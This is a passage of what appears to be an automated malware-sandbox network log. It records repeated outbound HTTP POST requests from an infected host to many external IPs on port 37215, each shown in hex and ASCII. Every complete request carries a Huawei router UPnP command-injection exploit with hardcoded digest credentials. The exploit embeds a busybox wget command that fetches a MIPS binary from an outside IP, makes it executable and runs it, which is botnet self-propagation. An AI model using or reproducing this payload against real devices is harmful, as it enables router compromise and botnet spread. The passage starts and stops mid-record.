2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            265192.168.2.134311641.237.191.10637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.205113888 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            266192.168.2.1336610197.128.46.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.205893040 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            267192.168.2.134767641.39.55.22937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.206691980 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            268192.168.2.1359202156.200.117.21537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.207478046 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            269192.168.2.1358864156.181.42.3837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.208229065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            270192.168.2.1342074156.250.0.8437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.208966017 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            271192.168.2.1346028156.46.209.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.209800005 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            272192.168.2.1350210156.62.210.21437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.210637093 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            273192.168.2.1345922156.25.179.1437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.211497068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            274192.168.2.1355900197.128.202.2037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.212308884 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            275192.168.2.1344874197.126.47.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.213145971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
